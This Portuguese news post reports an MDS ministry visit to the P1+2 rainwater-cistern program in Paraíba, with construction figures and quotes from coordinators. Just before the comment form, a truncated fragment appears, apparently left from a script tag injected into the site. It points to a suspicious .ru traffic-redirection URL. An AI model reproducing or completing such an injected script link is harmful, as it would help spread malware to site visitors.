Representantes do MDS visitam ações do P1+2 na Paraíba

Compartilhe!

Nos dias 10 e 11 de maio, o coordenador-geral de Acesso à Água da Secretaria Nacional de Segurança Alimentar e Nutricional (SESAN) do Ministério do Desenvolvimento Social e Combate à Fome (MDS), Igor Arsky, e o consultor Oscar Arruda, participaram de um encontro em Campina Grande (PB) com os coordenadores das Unidades Gestoras Territoriais (AS-PTA, ASPA e PATAC) que executam o Programa Uma Terra e Duas Águas, da Articulação no Semi-Árido Brasileiro (ASA), no Estado. O objetivo foi avaliar e discutir os procedimentos metodológicos que estão sendo abordados nas oficinas de formação ministradas com as famílias.

No primeiro dia (10/05), Igor Arsky visitou a família de Lisete e Garrincha, no município de Queimadas. A família mora na comunidade Catolé, na microbacia do Rio Catolé, local onde foram concentradas as ações da UGT AS-PTA. Durante a visita, ele conheceu a primeira cisterna-calçadão construída na região do Pólo da Borborema e como ela vem mudando a realidade da família.

Já no segundo dia (11/05), os representantes das UGT’s e do MDS discutiram os processos metodológicos, desafios e metas na implantação do P1+2 em quase 15 meses de execução do projeto na Paraíba.

As UGTs do estado desenvolveram em conjunto um processo metodológico no qual as famílias analisam coletivamente os caminhos percorridos pela água em suas propriedades, suas funções e disfunções dentro da área, e a partir disso, avaliam como as tecnologias sociais podem melhorar o abastecimento de água para suas famílias. Foram construídas 167 cisternas-calçadão, cinco barragens subterrâneas e três tanques de pedra na região do Pólo da Borborema.

Para José Camelo da Rocha, coordenador do P1+2 pela UGT AS-PTA, é importante essa parceria entre o MDS e as entidades sociais, pois conhecendo in loco as experiências, o governo federal, por meio de seus representantes, pode ter a ideia real das ações do projeto, seus desafios e, sobretudo, a satisfação das famílias beneficiadas com sua “segunda água”.

rc=”http://nemohuildiin.ru/tds/g

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *